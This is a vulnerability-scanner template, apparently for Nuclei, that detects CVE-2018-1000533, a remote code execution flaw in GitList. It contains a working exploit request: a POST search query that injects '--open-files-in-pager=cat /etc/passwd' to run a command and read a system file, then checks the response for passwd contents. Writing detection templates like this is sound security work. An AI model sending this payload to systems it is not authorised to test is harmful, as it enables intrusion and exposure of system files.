id: CVE-2018-1000533

info:
  name: GitList < 0.6.0 Remote Code Execution
  author: pikpikcu
  severity: critical
  description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533
    - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
    - https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-1000533
    cwe-id: CWE-20
  tags: git,cve,cve2018,gitlist,vulhub,rce

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /{{path}}/tree/a/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        query=--open-files-in-pager=cat%20/etc/passwd

    extractors:
      - type: regex
        name: path
        group: 1
        internal: true
        part: body
        regex:
          - '<span class="name">(.*?)</span>'

    matchers:
      - type: word
        words:
          - "root:/root:/bin/bash"
        part: body

# Enhanced by mp on 2022/04/08